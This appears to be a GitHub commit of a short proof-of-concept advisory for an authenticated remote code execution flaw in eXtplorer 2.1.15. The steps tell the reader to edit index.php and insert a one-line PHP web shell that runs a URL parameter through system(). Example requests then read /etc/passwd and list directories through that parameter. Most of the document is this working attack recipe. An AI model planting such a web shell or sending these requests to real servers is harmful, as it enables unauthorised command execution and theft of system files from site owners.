| | 1 | + | Title: eXtplorer 2.1.15 – Insecure Permissions following Remote Code Execution (Authenticated) |
| | 2 | + | Date: 2022-11-09 |
| | 3 | + | Author: Francisco Marinho |
| | 4 | + | Vendor Homepage: http://extplorer.net/ |
| | 5 | + | Software Link: http://extplorer.net/attachments/download/99/eXtplorer_2.1.15.zip |
| | 6 | + | Version: 2.1.15 |
| | 7 | + | Tested on: Linux |
| | 8 | + | ==========> POC <========== |
| | 9 | + | |
| | 10 | + | 1- Login with your account |
| | 11 | + | 2- Access the directory /index.php |
| | 12 | + | 3- Edit index.php, adding “system($_GET[‘tristao’]);” on line two. |
| | 13 | + | 4- Acess homepage index.php |
| | 14 | + | Examples: |
| | 15 | + | cat /etc/passwd |
| | 16 | + | /index.php?tristao=cat%20%20/etc/passwd |
| | 17 | + | cat ls -la |
| | 18 | + | /index.php?tristao=ls%20-la |
| | 19 | + | |
Tristão Marinho
committed
with
GitHub
1 year ago